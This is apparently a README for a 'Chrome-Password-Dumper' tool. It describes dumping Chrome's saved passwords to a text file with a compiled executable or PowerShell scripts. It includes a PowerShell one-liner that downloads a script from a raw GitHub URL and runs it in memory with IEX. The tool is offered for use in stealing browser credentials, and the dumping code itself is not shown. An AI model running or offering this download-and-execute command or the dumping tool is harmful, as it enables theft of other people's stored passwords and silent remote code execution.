Chrome-Password-Dumper

For Windows version simply run chrome.exe to dump the passwords to a text file.

For powershell version:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/roflsandwich/Chrome-Password-Dumper/master/chromev2.ps1')

Chrome must be closed before running the PoC

  • chrome.py uncompiled version

  • chrome.exe - compiled with py2exe

  • chrome.ps1 - powershell version

  • chromev2.ps1 - powershell version with a process check for chrome.